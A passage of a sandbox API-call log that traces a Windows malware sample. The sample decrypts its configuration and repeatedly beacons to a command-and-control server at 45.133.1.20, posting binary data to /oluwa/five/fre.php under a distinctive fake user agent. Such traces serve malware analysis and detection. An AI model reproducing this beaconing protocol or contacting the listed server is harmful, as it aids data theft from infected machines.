0x6d7f08 [0218.360] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.363] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0218.363] GetProcessHeap () returned 0x6a0000 [0218.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0218.363] GetProcessHeap () returned 0x6a0000 [0218.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.364] GetProcessHeap () returned 0x6a0000 [0218.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0218.364] GetProcessHeap () returned 0x6a0000 [0218.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0218.365] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.366] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0218.366] GetProcessHeap () returned 0x6a0000 [0218.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0218.366] GetProcessHeap () returned 0x6a0000 [0218.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.367] send (s=0x640, buf=0x6b5c98*, len=242, flags=0) returned 242 [0218.368] send (s=0x640, buf=0x6bb998*, len=159, flags=0) returned 159 [0218.368] GetProcessHeap () returned 0x6a0000 [0218.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0218.368] recv (in: s=0x640, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0218.438] GetProcessHeap () returned 0x6a0000 [0218.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0218.441] GetProcessHeap () returned 0x6a0000 [0218.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0218.442] GetProcessHeap () returned 0x6a0000 [0218.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0218.443] GetProcessHeap () returned 0x6a0000 [0218.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0218.444] closesocket (s=0x640) returned 0 [0218.445] GetProcessHeap () returned 0x6a0000 [0218.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0218.445] GetProcessHeap () returned 0x6a0000 [0218.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.447] GetProcessHeap () returned 0x6a0000 [0218.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0218.448] GetProcessHeap () returned 0x6a0000 [0218.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0218.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb5c) returned 0x640 [0218.453] Sleep (dwMilliseconds=0xea60) [0218.455] GetProcessHeap () returned 0x6a0000 [0218.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0218.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.456] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0218.470] GetProcessHeap () returned 0x6a0000 [0218.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.471] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0218.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.472] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.473] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.473] GetProcessHeap () returned 0x6a0000 [0218.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.475] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0218.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.476] CryptDestroyKey (hKey=0x6ad520) returned 1 [0218.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.477] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0218.477] GetProcessHeap () returned 0x6a0000 [0218.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.478] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.479] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.480] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.486] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.486] GetProcessHeap () returned 0x6a0000 [0218.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0218.486] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.486] GetProcessHeap () returned 0x6a0000 [0218.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0218.487] GetProcessHeap () returned 0x6a0000 [0218.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.488] GetProcessHeap () returned 0x6a0000 [0218.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0218.488] GetProcessHeap () returned 0x6a0000 [0218.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0218.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.489] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0218.508] GetProcessHeap () returned 0x6a0000 [0218.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0218.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.522] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.523] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.524] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.524] GetProcessHeap () returned 0x6a0000 [0218.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0218.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.526] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0218.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.535] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.536] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0218.536] GetProcessHeap () returned 0x6a0000 [0218.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.537] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0218.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0218.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.543] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0218.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.545] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0218.545] GetProcessHeap () returned 0x6a0000 [0218.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0218.545] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0218.545] GetProcessHeap () returned 0x6a0000 [0218.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0218.545] socket (af=2, type=1, protocol=6) returned 0x644 [0218.545] connect (s=0x644, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0218.568] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0218.568] GetProcessHeap () returned 0x6a0000 [0218.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0218.568] GetProcessHeap () returned 0x6a0000 [0218.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0218.569] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.569] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0218.569] GetProcessHeap () returned 0x6a0000 [0218.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0218.570] GetProcessHeap () returned 0x6a0000 [0218.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.570] GetProcessHeap () returned 0x6a0000 [0218.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0218.570] GetProcessHeap () returned 0x6a0000 [0218.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0218.571] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.573] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0218.573] GetProcessHeap () returned 0x6a0000 [0218.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0218.573] GetProcessHeap () returned 0x6a0000 [0218.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.574] send (s=0x644, buf=0x6b5c98*, len=242, flags=0) returned 242 [0218.575] send (s=0x644, buf=0x6bb998*, len=159, flags=0) returned 159 [0218.575] GetProcessHeap () returned 0x6a0000 [0218.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0218.575] recv (in: s=0x644, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0218.644] GetProcessHeap () returned 0x6a0000 [0218.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0218.645] GetProcessHeap () returned 0x6a0000 [0218.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0218.646] GetProcessHeap () returned 0x6a0000 [0218.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0218.646] GetProcessHeap () returned 0x6a0000 [0218.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0218.647] closesocket (s=0x644) returned 0 [0218.647] GetProcessHeap () returned 0x6a0000 [0218.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0218.647] GetProcessHeap () returned 0x6a0000 [0218.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.648] GetProcessHeap () returned 0x6a0000 [0218.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0218.649] GetProcessHeap () returned 0x6a0000 [0218.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0218.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13a8) returned 0x644 [0218.662] Sleep (dwMilliseconds=0xea60) [0218.663] GetProcessHeap () returned 0x6a0000 [0218.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0218.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0218.681] GetProcessHeap () returned 0x6a0000 [0218.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.682] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.683] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.684] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.684] GetProcessHeap () returned 0x6a0000 [0218.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.686] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0218.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.687] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.688] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0218.688] GetProcessHeap () returned 0x6a0000 [0218.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.689] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.690] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.691] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.692] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.692] GetProcessHeap () returned 0x6a0000 [0218.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0218.695] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.695] GetProcessHeap () returned 0x6a0000 [0218.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0218.696] GetProcessHeap () returned 0x6a0000 [0218.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.696] GetProcessHeap () returned 0x6a0000 [0218.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0218.697] GetProcessHeap () returned 0x6a0000 [0218.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0218.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0218.712] GetProcessHeap () returned 0x6a0000 [0218.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0218.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.713] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0218.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.718] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.719] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.719] GetProcessHeap () returned 0x6a0000 [0218.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0218.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.720] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0218.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.721] CryptDestroyKey (hKey=0x6ad020) returned 1 [0218.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.722] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0218.722] GetProcessHeap () returned 0x6a0000 [0218.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0218.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.724] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0218.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0218.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.726] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0218.726] GetProcessHeap () returned 0x6a0000 [0218.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0218.726] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0218.730] GetProcessHeap () returned 0x6a0000 [0218.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0218.730] socket (af=2, type=1, protocol=6) returned 0x648 [0218.730] connect (s=0x648, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0218.756] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0218.756] GetProcessHeap () returned 0x6a0000 [0218.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0218.756] GetProcessHeap () returned 0x6a0000 [0218.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0218.756] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.757] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0218.757] GetProcessHeap () returned 0x6a0000 [0218.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0218.757] GetProcessHeap () returned 0x6a0000 [0218.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.758] GetProcessHeap () returned 0x6a0000 [0218.758] RtlAllocateHeap 